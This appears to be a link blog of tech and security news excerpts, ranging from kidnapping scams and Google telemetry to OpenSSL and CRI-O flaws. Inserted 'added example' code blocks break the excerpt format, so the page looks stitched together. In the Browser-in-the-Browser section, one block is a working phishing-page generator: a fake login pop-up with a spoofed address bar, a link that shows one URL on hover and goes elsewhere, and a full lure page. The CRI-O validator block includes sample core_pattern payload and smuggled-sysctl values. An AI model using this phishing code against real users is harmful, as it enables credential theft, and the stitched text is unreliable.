At that point, you’ve sealed your fate. Never mind that the screams you’re hearing aren’t those of your own kid. In a split second, you’ve not only bought into the con, but you’ve also given the kidnappers the one thing they need to make it stick. “We’ve kidnapped Lisa,” they tell you — and with that, your fear takes over. Adrenaline floods your bloodstream, your heart rate soars, your breath quickens, and your blood sugar spikes. No matter how skeptical or street-savvy you consider yourself, they’ve got you.

[…]

The other elements of virtual kidnappings are taken straight from the playbook for classic cons. Don’t give the mark time to think. Don’t let them talk to anyone else. Get them to withdraw an amount of cash they can get their hands on right away, and wire it somewhere untraceable. Convince them a single deviation from your instructions will cost them dearly.

[…]

the most innovative aspect of the scheme was the kidnapping calls: They were made from inside the prison in Mexico City, where Ramirez was serving time. “Who has time seven days a week, 12 hours a day, to make phone calls to the US, over and over and over, with a terrible success rate?” Arbuthnot says. “Prisoners. That was a really big moment for us. When we realized what was happening, it all made sense.”

[…]

there’s an obvious problem: Ramirez and Zuniga are already incarcerated, as the feds suspect is the case with almost every other virtual kidnapper who is still cold-calling potential victims. Which raises the question: How do you stop a crime that’s being committed by criminals you’ve already caught?

“What are we going to do?” Arbuthnot says. “We’re going to put these people in jail? They’re already in jail.”

[…]


Source: Virtual Kidnappers Are Scamming Parents Out of Millions of Dollars

Apple Maps, Music, iMessage, App Store, and iCloud Are Down

Apple’s services came back online in the late afternoon. Apple’s system status page shows that all of the services that had previously been listed as “down” are now back in the green. It’s still unclear what happened exactly, and Apple never returned Gizmodo’s email for comment on the situation.

Apple is experiencing massive technical difficulties, and widespread reports of outages for its various services are flooding the internet.

The company’s own status page shows that several of its most popular products aren’t working. Multiple reports—including from Down Detector, which tracks website and app outages—have shown that users of iCloud, Apple Music, the App Store, iTunes, Apple TV, iMessage, Mail, Contacts, Find My, Apple Maps, FaceTime, Apple Fitness+, and even our beloved domestic helper Siri all appear to be having major problems. Additionally, Bloomberg reports that Apple’s internal systems, both for its corporate offices and its Apple Store retail locations, are down as well. The company reportedly sent internal messages notifying employees, who had difficulty working from home, that domain name system (DNS) problems led to the outage. The full extent of these outages and the regions they are affecting is unclear.

[…]

Source: Apple Maps, Music, iMessage, App Store, and iCloud Are Down

Edit: Websiteplanet has another tool to detect if a website is down or not

Messages, Dialer apps sent text, call info to Google

Google’s Messages and Dialer apps for Android devices have been collecting and sending data to Google without specific notice and consent, and without offering the opportunity to opt-out, potentially in violation of Europe’s data protection law.

According to a research paper, “What Data Do The Google Dialer and Messages Apps On Android Send to Google?” [PDF], by Trinity College Dublin computer science professor Douglas Leith, Google Messages (for text messaging) and Google Dialer (for phone calls) have been sending data about user communications to the Google Play Services Clearcut logger service and to Google’s Firebase Analytics service.

“The data sent by Google Messages includes a hash of the message text, allowing linking of sender and receiver in a message exchange,” the paper says. “The data sent by Google Dialer includes the call time and duration, again allowing linking of the two handsets engaged in a phone call. Phone numbers are also sent to Google.”

The timing and duration of other user interactions with these apps has also been transmitted to Google. And Google offers no way to opt-out of this data collection.

[…]

From the Messages app, Google takes the message content and a timestamp, generates a SHA256 hash, which is the output of an algorithm that maps the human readable content to an alphanumeric digest, and then transmits a portion of the hash, specifically a truncated 128-bit value, to Google’s Clearcut logger and Firebase Analytics.

Hashes are designed to be difficult to reverse, but in the case of short messages, Leith said he believes some of these could be undone to recover some of the message content.

“I’m told by colleagues that yes, in principle this is likely to be possible,” Leith said in an email to The Register today. “The hash includes a hourly timestamp, so it would involve generating hashes for all combinations of timestamps and target messages and comparing these against the observed hash for a match – feasible I think for short messages given modern compute power.”

The Dialer app likewise logs incoming and outgoing calls, along with the time and the call duration.

[…]

The paper describes nine recommendations made by Leith and six changes Google has already made or plans to make to address the concerns raised in the paper. The changes Google has agreed to include:

  • Revising the app onboarding flow so that users are notified they’re using a Google app and are presented with a link to Google’s consumer privacy policy.
  • Halting the collection of the sender phone number by the CARRIER_SERVICES log source, of the SIM ICCID, and of a hash of sent/received message text by Google Messages.
  • Halting the logging of call-related events in Firebase Analytics from both Google Dialer and Messages.
  • Shifting more telemetry data collection to use the least long-lived identifier available where possible, rather than linking it to a user’s persistent Android ID.
  • Making it clear when caller ID and spam protection is turned on and how it can be disabled, while also looking at ways to use less information or fuzzed information for safety functions.

[…]

Leith said there are two larger matters related to Google Play Services, which is installed on almost all Android phones outside of China.

“The first is that the logging data sent by Google Play Services is tagged with the Google Android ID which can often be linked to a person’s real identity – so the data is not anonymous,” he said. “The second is that we know very little about what data is being sent by Google Play Services, and for what purpose(s). This study is the first to cast some light on that, but it’s very much just the tip of the iceberg.”

Source: Messages, Dialer apps sent text, call info to Google • The Register

Browser In The Browser (BITB) Attack

This article explores a phishing technique that simulates a browser window within the browser to spoof a legitimate domain.

Introduction

For security professionals, the URL is usually the most trusted aspect of a domain. Yes, there are attacks like IDN homograph and DNS hijacking that may degrade the reliability of URLs, but not to an extent that makes URLs unreliable.

All of this eventually led me to think: is it possible to make the “Check the URL” advice less reliable? After a week of brainstorming I decided that the answer is yes.

Demo

Pop-Up Login Windows

Quite often when we authenticate to a website via Google, Microsoft, Apple etc. we’re provided a pop-up window that asks us to authenticate. The image below shows the window that appears when someone attempts to login to Canva using their Google account.

Canva-Login

Replicating The Window

Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it’s basically indistinguishable. The image below shows the fake window compared with the real window. Very few people would notice the slight differences between the two.

Real-Fake

JavaScript can easily be used to make the window appear on a link or button click, on page load, etc. And of course you can make the window appear in a visually appealing manner through animations available in libraries such as jQuery.

Demo

Demo-GIF

Custom URL on-hover

Hovering over a URL to determine if it’s legitimate is not very effective when JavaScript is permitted. HTML for a link generally looks like this:

<a href="https://gmail.com">Google</a>

If an onclick event that returns false is added, then hovering over the link will continue to show the website in the href attribute but when the link is clicked then the href attribute is ignored. We can use this knowledge to make the pop-up window appear more realistic.

<a href="https://gmail.com" onclick="return launchWindow();">Google</a>

<script>
function launchWindow(){
    // Launch the fake authentication window here (e.g. insert the fake window HTML into the page)
    return false; // Returning false cancels the default navigation, so the href attribute is ignored
}
</script>
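The two pieces described above, the replicated window and the link whose href is not what gets followed, as an added example that is not code from the mr.d0x post or its GitHub templates. It builds the HTML for a fake browser pop-up whose address bar displays a trusted hostname while an iframe loads the attacker's page, plus the anchor whose onclick handler returns false. Colours, dimensions and the window title are assumptions for illustration. The functions run under Node.js and produce strings to be placed in a page.

```javascript
// Added example (not code from the mr.d0x post or its GitHub templates).
// Builds the fake browser pop-up the post describes and the link that
// opens it: the address bar shows a trusted hostname, the iframe loads the
// attacker's page, and the link's href is what the status bar shows on
// hover but never where the click goes. Colours, sizes and the title text
// are assumptions. Runs under Node.js.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Two themes, matching the light/dark templates the post mentions.
const THEMES = {
  light: { chrome: '#f1f3f4', text: '#202124', bar: '#ffffff' },
  dark:  { chrome: '#202124', text: '#e8eaed', bar: '#303134' },
};

// displayUrl: the URL the victim is meant to read (the real provider's).
// iframeSrc: the attacker-hosted page that actually receives the credentials.
function buildFakeWindow({ displayUrl, iframeSrc, title = 'Sign in - Google Accounts', theme = 'light' }) {
  const t = THEMES[theme] || THEMES.light;
  const url = new URL(displayUrl); // throws on a malformed displayUrl
  const host = escapeHtml(url.host);
  const rest = escapeHtml(url.pathname + url.search);
  return [
    '<div class="bitb-window" style="position:fixed;top:80px;left:50%;width:480px;margin-left:-240px;' +
      `border-radius:8px;box-shadow:0 8px 32px rgba(0,0,0,.35);background:${t.chrome};color:${t.text};` +
      'font:13px system-ui,sans-serif;overflow:hidden;z-index:9999">',
    `  <div class="bitb-titlebar" style="padding:8px 12px">${escapeHtml(title)}</div>`,
    // The spoofed address bar: padlock glyph plus the trusted host in bold.
    `  <div class="bitb-urlbar" style="margin:0 8px 8px;padding:6px 10px;border-radius:14px;background:${t.bar}">` +
      `&#128274; <b>${host}</b>${rest}</div>`,
    // The real content: an iframe to the attacker's page; its URL is never displayed.
    `  <iframe src="${escapeHtml(iframeSrc)}" style="display:block;width:100%;height:520px;border:0;background:#fff"></iframe>`,
    '</div>',
  ].join('\n');
}

// The on-hover trick: the status bar shows `href`, but the handler returns
// false so the browser never navigates there.
function spoofedLink(href, text, handler = 'launchWindow') {
  return `<a href="${escapeHtml(href)}" onclick="return ${handler}();">${escapeHtml(text)}</a>`;
}

// Inline script defining launchWindow(): injects the fake window on click and
// cancels the real navigation. '<' is escaped inside the string literal so the
// embedded HTML cannot close the script element early.
function launcherScript(windowHtml) {
  const literal = JSON.stringify(windowHtml).replace(/</g, '\\u003c');
  return '<script>function launchWindow(){' +
    `document.body.insertAdjacentHTML('beforeend', ${literal});` +
    'return false;}</script>';
}

// What the victim reads versus where the form really posts.
function describe(windowHtml) {
  const shown = /<b>([^<]+)<\/b>/.exec(windowHtml);
  const src = /<iframe src="([^"]+)"/.exec(windowHtml);
  return { shownHost: shown ? shown[1] : null, iframeSrc: src ? src[1] : null };
}

// A complete lure page: hover shows https://gmail.com, the click opens the fake window.
function buildPhishPage(displayUrl, iframeSrc) {
  const win = buildFakeWindow({ displayUrl, iframeSrc });
  return `<!doctype html><body>${spoofedLink('https://gmail.com', 'Google')}${launcherScript(win)}</body>`;
}
```

Two checks defeat this that "read the URL" does not. A real pop-up is a separate window: it can be dragged past the edge of the page that opened it, and resizing or minimising the parent does not move it, whereas the fake is a positioned div that cannot leave the parent's viewport. And a password manager keyed to the real origin will not autofill into the iframe, because the iframe's document is served from the attacker's host; a login form that a normally-working manager refuses to fill is a strong signal.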

Available Templates

I’ve created templates for the following OS and browser:

  • Windows – Chrome (Light & Dark Mode)
  • Mac OSX – Chrome (Light & Dark Mode)

The templates are available on my Github here.

Conclusion

With this technique we are now able to up our phishing game. The target user would still need to land on your website for the pop-up window to be displayed. But once landed on the attacker-owned website, the user will be at ease as they type their credentials away on what appears to be the legitimate website (because the trustworthy URL says so).

Source: Browser In The Browser (BITB) Attack | mr.d0x

High-Severity DoS Vulnerability Patched in OpenSSL

The flaw, tracked as CVE-2022-0778, was reported to the OpenSSL Project by Google vulnerability researcher Tavis Ormandy.

The security hole affects OpenSSL versions 1.0.2, 1.1.1 and 3.0, and it has been fixed with the release of versions 1.0.2zd (for premium support customers), 1.1.1n and 3.0.2. Version 1.1.0 is also impacted, but it’s no longer supported and will not receive a patch.

Exploitation of the vulnerability is possible in certain situations, and it can lead to a DoS attack against a process that parses externally supplied certificates.

“The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli,” the OpenSSL Project explained in its advisory. “Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form.”

“It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters,” the advisory reads.
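The loop the advisory describes, as an added example; this is not OpenSSL's BN_mod_sqrt() and not the actual patch. BN_mod_sqrt() computes modular square roots with the Tonelli-Shanks algorithm, which is correct only when the modulus is prime; certificate parsing reaches it when it has to decompress an EC point, and with explicit curve parameters the "prime" is whatever the certificate says it is. The inner search below is written two ways: guarded, so it fails cleanly when the input is not a square or the modulus is not prime, and unguarded, which spins forever on a composite modulus. A demo cap (maxIter) turns the unguarded spin into a thrown error so the example terminates. Runs under Node.js (BigInt).

```javascript
// Added example; not OpenSSL's BN_mod_sqrt() and not the fix for
// CVE-2022-0778. Tonelli-Shanks modular square root with the inner search
// loop either guarded (returns null on a non-square or a composite
// modulus) or unguarded (spins on a composite modulus; maxIter converts
// that into an error here). Runs under Node.js with BigInt.

function modPow(base, exp, mod) {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

// Returns x with x*x == a (mod p) for an odd prime p, or null if there is
// none. With bounded=false the inner loop has no exit when p is composite.
function modSqrt(a, p, { bounded = true, maxIter = 10000 } = {}) {
  a = ((a % p) + p) % p;
  if (a === 0n) return 0n;
  if (p < 3n || p % 2n === 0n) return null;

  // p - 1 = q * 2^e with q odd.
  let q = p - 1n, e = 0n;
  while (q % 2n === 0n) { q /= 2n; e++; }

  // A quadratic non-residue z via Euler's criterion (only meaningful for prime p).
  let z = 2n, probes = 0;
  while (modPow(z, (p - 1n) / 2n, p) !== p - 1n) {
    z++;
    if (++probes > maxIter) return null;
  }

  let c = modPow(z, q, p);
  let x = modPow(a, (q + 1n) / 2n, p);
  let t = modPow(a, q, p);
  let m = e;
  let spins = 0;

  while (t !== 1n) {
    // Least i with t^(2^i) == 1. For prime p and a square a, i < m always
    // holds; reaching i == m means "not a square". On a composite modulus
    // the sequence t, t^2, t^4, ... need never reach 1 at all.
    let i = 0n, tt = t;
    while (tt !== 1n) {
      tt = (tt * tt) % p;
      i++;
      if (bounded && i >= m) return null; // the guard that was missing
      if (++spins > maxIter) {
        throw new Error(`no progress after ${maxIter} squarings: modulus not prime?`);
      }
    }
    const b = modPow(c, 1n << (m - i - 1n), p);
    x = (x * b) % p;
    c = (b * b) % p;
    t = (t * c) % p;
    m = i;
  }
  return x;
}

// A caller should verify the result rather than trust the routine.
function isSqrt(x, a, p) {
  return x !== null && (x * x) % p === ((a % p) + p) % p;
}
```

Two things follow for anyone parsing untrusted certificates. First, the loop bound belongs inside the primitive, since a parser cannot cheaply prove the field prime in a certificate is actually prime; a primality check before decompression would also work but costs more than the guard. Second, this is a hang, not memory corruption, so the impact is on anything that parses certificates it did not choose: TLS clients, servers doing client authentication, and tools that read CRLs or certificates from disk. Updating to 1.1.1n or 3.0.2 is the fix; the example is only to show why an unbounded search is the wrong shape for attacker-supplied moduli.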

Source: High-Severity DoS Vulnerability Patched in OpenSSL | SecurityWeek.Com

Kubernetes container runtime CRI-O has make-me-root flaw

A vulnerability in the container runtime engine CRI-O can be exploited by a rogue user to gain root-level access on a host.

In a Kubernetes environment powered by CRI-O, the security hole can be used by a miscreant to move through a cluster as an administrator, install malware, and cause other chaos.

CrowdStrike’s threat research team discovered the privilege-escalation flaw in CRI-O version 1.19. The bug, tracked as CVE-2022-0811 and more creatively dubbed cr8escape, received a severity score of 8.8 out of 10.

CrowdStrike privately disclosed the vulnerability, and CRI-O’s developers today released a fix while recommending immediate patching. Besides Kubernetes, other software and platforms that depend on or use CRI-O – these include OpenShift and Oracle Container Engine for Kubernetes – may also be vulnerable, CrowdStrike warned.

Each Kubernetes node includes a container runtime such as CRI-O. Among other tasks, the container runtime allows containerized apps to safely share each node’s underlying Linux kernel and other resources. As part of this, Linux ensures that when one container alters a kernel setting, this change isn’t reflected in other containers or on the host as a whole, thus keeping the containers suitably isolated from each other and the underlying platform, CrowdStrike explained.

“Some parameters are namespaced and can therefore be set in a single container without impacting the system at large,” the threat researchers wrote. “Kubernetes and the container runtimes it drives allow pods to update these ‘safe’ kernel settings while blocking access to others.”

And herein lies the security flaw: CRI-O introduced a bug that allows attackers to bypass these safeguards and set kernel parameters. “Due to the addition of sysctl support in version 1.19, [the pinns utility] will now blindly set any kernel parameters it’s passed without validation,” the threat researchers explained.

This means that anyone who can deploy a pod on a cluster using the CRI-O runtime can “abuse the kernel.core_pattern parameter to achieve container escape and arbitrary code execution as root on any node in the cluster,” CrowdStrike continued.
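The validation the article says pinns skipped, as an added example that is not CRI-O, pinns or CrowdStrike code. It checks the sysctls a pod requests against the Kubernetes "safe" set (the documented namespaced sysctls a runtime may set per pod), lets an operator allowlist specific unsafe ones the way the kubelet's allowed-unsafe-sysctls flag does, refuses parameters whose value is a program the kernel runs as root on the host, and rejects values containing characters that could carry a second name=value pair through to whatever the runtime invokes. The name and value syntax rules are this example's own, not pinns's, and the sample pod fragments are constructed. Runs under Node.js.

```javascript
// Added example (not CRI-O, pinns or CrowdStrike code): validate a pod's
// requested sysctls before any of them reach the node. Safe set from the
// Kubernetes documentation; name/value syntax rules are this example's own.
// Runs under Node.js.

const SAFE_SYSCTLS = new Set([
  'kernel.shm_rmid_forced',
  'net.ipv4.ip_local_port_range',
  'net.ipv4.tcp_syncookies',
  'net.ipv4.ping_group_range',
  'net.ipv4.ip_unprivileged_port_start',
]);

// Parameters whose value is a path or pipe the kernel executes as root on the host.
const NEVER_ALLOW = new Set(['kernel.core_pattern', 'kernel.modprobe']);

// Dotted sysctl names only (letters, digits, '_' and '-').
const NAME_RE = /^[a-z0-9_]+(\.[a-z0-9_-]+)+$/;
// Values: letters, digits, spaces (ranges such as "32768 60999"), '.', '_', ':', '/', '-'.
// No '=', '+', ',', ';', '|' or control characters, so a value cannot carry another parameter.
const VALUE_RE = /^[A-Za-z0-9 ._:\/-]+$/;

// sysctls: [{ name, value }] as in a pod's securityContext.sysctls.
// allowedUnsafe: names an administrator has explicitly enabled on the node.
function validateSysctls(sysctls, allowedUnsafe = []) {
  const extra = new Set(allowedUnsafe);
  const problems = [];
  for (const { name, value } of sysctls) {
    if (typeof name !== 'string' || !NAME_RE.test(name)) {
      problems.push(`${name}: malformed sysctl name`);
      continue;
    }
    if (NEVER_ALLOW.has(name)) {
      problems.push(`${name}: executes a host program as root; refused even if allowlisted`);
    } else if (!SAFE_SYSCTLS.has(name) && !extra.has(name)) {
      problems.push(`${name}: not namespaced-safe and not in the node allowlist`);
    }
    if (typeof value !== 'string' || !VALUE_RE.test(value)) {
      problems.push(`${name}: value ${JSON.stringify(value)} contains characters that are not allowed`);
    }
  }
  return { ok: problems.length === 0, problems };
}

// Constructed pod fragments for illustration, not taken from the article.
const SAMPLE_PODS = {
  ok: [
    { name: 'kernel.shm_rmid_forced', value: '1' },
    { name: 'net.ipv4.ip_local_port_range', value: '32768 60999' },
  ],
  corePattern: [{ name: 'kernel.core_pattern', value: '|/var/lib/containers/payload.sh' }],
  // A safe name whose value tries to carry a second parameter along.
  smuggled: [{ name: 'kernel.shm_rmid_forced', value: '1+kernel.core_pattern=|/tmp/x' }],
  unsafeUnlisted: [{ name: 'net.core.somaxconn', value: '4096' }],
};
```

The same rule applies at every layer the request passes through: the API server's validation, an admission policy (Pod Security Admission's baseline profile already rejects unsafe sysctls), the kubelet's allowlist, and finally the runtime, which should treat what it receives as untrusted even when the layers above are supposed to have checked it. The point of the bug is that the last of those layers trusted the others.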

[…]

Source: Kubernetes container runtime CRI-O has make-me-root flaw

Microsoft PowerToys – customise your windows experience

Microsoft PowerToys is a set of utilities for power users to tune and streamline their Windows experience for greater productivity.

Always on Top

Always on Top screenshot

Always on Top enables you to pin windows on top of all other windows with a quick key shortcut (⊞ Win+Ctrl+T).

PowerToys Awake

PowerToys Awake screenshot

PowerToys Awake is designed to keep a computer awake without having to manage its power & sleep settings. This behavior can be helpful when running time-consuming tasks, ensuring that the computer does not go to sleep or turns off its screens.

Color Picker

ColorPicker screenshot

ColorPicker is a system-wide color picking utility activated with Win+Shift+C. Pick colors from any currently running application, the picker automatically copies the color into your clipboard in a set format. Color Picker also contains an editor that shows a history of previously picked colors, allows you to fine-tune the selected color and to copy different string representations. This code is based on Martin Chrzan’s Color Picker.

FancyZones

FancyZones screenshot

FancyZones is a window manager that makes it easy to create complex window layouts and quickly position windows into those layouts.

File Explorer add-ons

File Explorer screenshot

File Explorer add-ons enable preview pane rendering in File Explorer to display SVG icons (.svg), Markdown (.md) and PDF file previews. To enable the preview pane, select the “View” tab in File Explorer, then select “Preview Pane”.

Image Resizer

Image Resizer screenshot

Image Resizer is a Windows Shell extension for quickly resizing images. With a simple right click from File Explorer, resize one or many images instantly. This code is based on Brice Lambson’s Image Resizer.

Keyboard Manager

Keyboard Manager screenshot

Keyboard Manager allows you to customize the keyboard to be more productive by remapping keys and creating your own keyboard shortcuts. This PowerToy requires Windows 10 1903 (build 18362) or later.

Mouse utilities

Mouse utilities screenshot

Mouse utilities add functionality to enhance your mouse and cursor. With Find My Mouse, quickly locate your mouse’s position with a spotlight that focuses on your cursor. This feature is based on source code developed by Raymond Chen.

PowerRename

PowerRename screenshot

PowerRename enables you to perform bulk renaming, searching and replacing file names. It includes advanced features, such as using regular expressions, targeting specific file types, previewing expected results, and the ability to undo changes. This code is based on Chris Davis’s SmartRename.

PowerToys Run

PowerToys Run screenshot

PowerToys Run can help you search and launch your app instantly – just press the shortcut Alt+Space and start typing. It is open source and modular for additional plugins. Window Walker is now included as well. This PowerToy requires Windows 10 1903 (build 18362) or later.

Shortcut Guide

Shortcut Guide screenshot

Windows key shortcut guide appears when a user presses ⊞ Win+Shift+/ (or as we like to think, ⊞ Win+?) and shows the available shortcuts for the current state of the desktop. You can also change this setting and press and hold ⊞ Win.

Video Conference Mute

Video Conference Mute screenshot

Video Conference Mute is a quick way to globally “mute” both your microphone and camera using ⊞ Win+Shift+Q while on a conference call, regardless of the application that currently has focus. This requires Windows 10 1903 (build 18362) or later.

Source: Microsoft PowerToys | Microsoft Docs

Something good from the war: Russia Says Its Businesses Can Use Patents From Anyone In ‘Unfriendly’ Countries

Russia has effectively legalized patent theft from anyone affiliated with countries “unfriendly” to it, declaring that unauthorized use will not be compensated. The Washington Post reports: The decree, issued this week, illustrates the economic war waged around Russia’s invasion of Ukraine, as the West levies sanctions and pulls away from Russia’s huge oil and gas industry. Russian officials have also raised the possibility of lifting restrictions on some trademarks, according to state media, which could allow continued use of brands such as McDonald’s that are withdrawing from Russia in droves. The effect of losing patent protections will vary by company, experts say, depending on whether they have a valuable patent in Russia. The U.S. government has long warned of intellectual property rights violations in the country; last year Russia was among nine nations on a “priority watch list” for alleged failures to protect intellectual property. Now Russian entities could not be sued for damages if they use certain patents without permission.

The patent decree and any further lifting of intellectual property protections could affect Western investment in Russia well beyond any de-escalation of the war in Ukraine, said Josh Gerben, an intellectual property lawyer in Washington. Firms that already saw risks in Russian business would have more reason to worry. “It’s just another example of how [Putin] has forever changed the relationship that Russia will have with the world,” Gerben said. Russia’s decree removes protections for patent holders who are registered in hostile countries, do business in them or hold their nationality.

The Kremlin has not issued any decree lifting protections on trademarks. But Russia’s Ministry of Economic Development said last week that authorities are considering “removing restrictions on the use of intellectual property contained in certain goods whose supply to Russia is restricted,” according to Russian state news outlet Tass, and that potential measures could affect inventions, computer programs and trademarks. The ministry said the measures would “mitigate the impact on the market of supply chain breaks, as well as shortages of goods and services that have arisen due to the new sanctions of western countries,” Tass stated. Gerben said a similar decree on trademarks would pave the way for Russian companies to exploit American brand names that have halted their business in Russia. He gave a hypothetical involving McDonald’s, one of the latest global giants to suspend operations in Russia under public pressure.

Source: Russia Says Its Businesses Can Steal Patents From Anyone In ‘Unfriendly’ Countries – Slashdot

Considering that patents are bad for innovation, make customers bleed and basically empower laziness, this should be an interesting experiment in skyrocketing Russian technologies

Android will soon let you archive apps to save space

[…]

Google announced today it’s working on a new feature it estimates will reduce the space some apps take up by approximately 60 percent. Best of all, your personal data won’t be affected. The feature is called app archiving and will arrive later this year. Rather than uninstalling an app completely, it instead temporarily removes some parts of it and generates a new type of Android Package known as an archived APK. That package preserves your data until the moment you restore the app to its former form.

“Once launched, archiving will deliver great benefits to both users and developers. Instead of uninstalling an app, users would be able to ‘archive’ it – free up space temporarily and be able to re-activate the app quickly and easily,” the company said. “Developers can benefit from fewer uninstalls and substantially lower friction to pick back up with their favorite apps.”

[…]

Source: Android will soon let you archive apps to save space | Engadget

HBO hit with class action lawsuit for allegedly sharing subscriber data with Facebook

HBO is facing a class action lawsuit over allegations that it gave subscribers’ viewing history to Facebook without proper permission, Variety has reported. The suit accuses HBO of providing Facebook with customer lists, allowing the social network to match viewing habits with their profiles.

It further alleges that HBO knows Facebook can combine the data because HBO is a major Facebook advertiser — and Facebook can then use that information to retarget ads to its subscribers. Since HBO never received proper customer consent to do this, it allegedly violated the 1988 Video Privacy Protection Act (VPPA), according to the lawsuit.

HBO, like other sites, discloses to users that it (and partners) use cookies to deliver personalized ads. However, the VPPA requires separate consent from users to share their video viewing history. “A standard privacy policy will not suffice,” according to the suit.

Other streaming providers have been hit with similar claims, and TikTok recently agreed to pay a $92 million settlement for (in part) violating the VPPA. In another case, however, a judge ruled in 2015 that Hulu didn’t knowingly share data with Facebook that could establish an individual’s viewing history. The law firm involved in the HBO suit previously won a $50 million settlement with Hearst after alleging that it violated Michigan privacy laws by selling subscriber data.

Source: HBO hit with class action lawsuit for allegedly sharing subscriber data with Facebook | Engadget